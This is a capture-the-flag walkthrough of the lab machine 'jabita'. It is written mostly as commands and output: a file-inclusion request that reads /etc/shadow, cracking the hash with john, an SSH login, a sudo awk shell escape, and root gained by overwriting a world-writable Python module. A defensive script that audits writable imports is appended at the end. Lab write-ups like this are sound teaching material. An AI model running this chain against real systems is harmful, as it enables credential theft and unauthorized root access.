jabita

Fri, Sep 09, 2022

```
GET /building/index.php?page=/etc/shadow HTTP/1.1
```

LOL

```
┌──(root💀kali)-[/opt/hmv/jabita]
└─# john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha         (jack)
1g 0:00:00:02 DONE (2022-09-09 07:16) 0.4347g/s 1669p/s 1669c/s 1669C/s energy..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

```
┌──(root💀kali)-[/opt/hmv/jabita]
└─# ssh jack@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ED25519 key fingerprint is SHA256:Sxz30elYyqNibTrCsnd7Xa6CrZ6qllyKNc+LfOMtZSo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ED25519) to the list of known hosts.
jack@10.10.10.123's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-47-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep 5 01:40:05 PM UTC 2022

  System load:  0.4404296875      Processes:               111
  Usage of /:   51.4% of 9.75GB   Users logged in:         0
  Memory usage: 21%               IPv4 address for enp0s3: 192.163.0.112
  Swap usage:   0%

6 updates can be applied immediately.
3 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Mon Sep 5 12:01:58 2022 from 192.163.0.90
jack@jabita:~$ sudo -l
Matching Defaults entries for jack on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jack may run the following commands on jabita:
    (jaba : jaba) NOPASSWD: /usr/bin/awk
jack@jabita:~$ sudo -u jaba /usr/bin/awk 'BEGIN {system("/bin/sh")}'
$ id
uid=1002(jaba) gid=1002(jaba) groups=1002(jaba)
$ bash
jaba@jabita:~$
jaba@jabita:/$ sudo -l
Matching Defaults entries for jaba on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jaba may run the following commands on jabita:
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py
jaba@jabita:/$ cat /usr/bin/clean.py
import wild
wild.first()
jaba@jabita:/$ cd /
jaba@jabita:/$ find . -name wild.py 2>/dev/null
./usr/lib/python3.10/wild.py
```

Let’s see

```
jaba@jabita:/$ ls -lash /usr/lib/python3.10/ | grep wild
4.0K -rw-r--rw- 1 root root 29 Sep 5 12:48 wild.py
```

Write access

```
jaba@jabita:/$ printf 'import os;os.system("/bin/bash")\n' > /usr/lib/python3.10/wild.py
jaba@jabita:/$ sudo -u root /usr/bin/python3 /usr/bin/clean.py
root@jabita:/# id
uid=0(root) gid=0(root) groups=0(root)
root@jabita:/#
```
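The last step works because a script that sudo runs as root imports a module whose file is world-writable. The following audit is an added example, not part of the original write-up: it statically lists what a sudo-allowed script imports and flags any module file or containing directory that a non-trusted user could modify. The function names, the `trusted_uids` parameter and the sample layout (including the body of `wild.py`) are constructed for illustration.

```python
import ast, os, stat, sys, tempfile
from importlib.machinery import PathFinder

def imported_modules(script_path):
    """Top-level modules the script imports (parsed statically, never executed)."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def audit(script_path, search_path=None, trusted_uids=(0,)):
    """Return (module, path, reason) for each import a non-trusted user could replace."""
    paths = [os.path.dirname(os.path.abspath(script_path))]  # sys.path[0] at run time
    paths += sys.path if search_path is None else search_path
    findings = []
    for name in imported_modules(script_path):
        spec = PathFinder.find_spec(name, paths)
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # built-in, frozen or not found on this path
        for target in (spec.origin, os.path.dirname(spec.origin)):
            st = os.stat(target)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((name, target, "group/world-writable"))
            elif st.st_uid not in trusted_uids:
                findings.append((name, target, "owner not trusted"))
    return findings

def build_sample(root):
    """Constructed layout mirroring the page: bin/clean.py imports lib/wild.py (mode 0646)."""
    files = {"bin/clean.py": ("import wild\nwild.first()\n", 0o755),
             "lib/wild.py": ("def first():\n    pass\n", 0o646)}
    for rel, (body, mode) in files.items():
        path = os.path.join(root, rel)
        os.mkdir(os.path.dirname(path))
        os.chmod(os.path.dirname(path), 0o755)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return os.path.join(root, "bin/clean.py"), os.path.join(root, "lib")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        script, lib_dir = build_sample(tmp)
        print(audit(script, [lib_dir], trusted_uids=(os.getuid(),)))
```

On a real host, call `audit()` with the script named in the sudoers entry and the default search path, keeping `trusted_uids=(0,)`; an empty result means every resolved import is root-owned and not group- or world-writable.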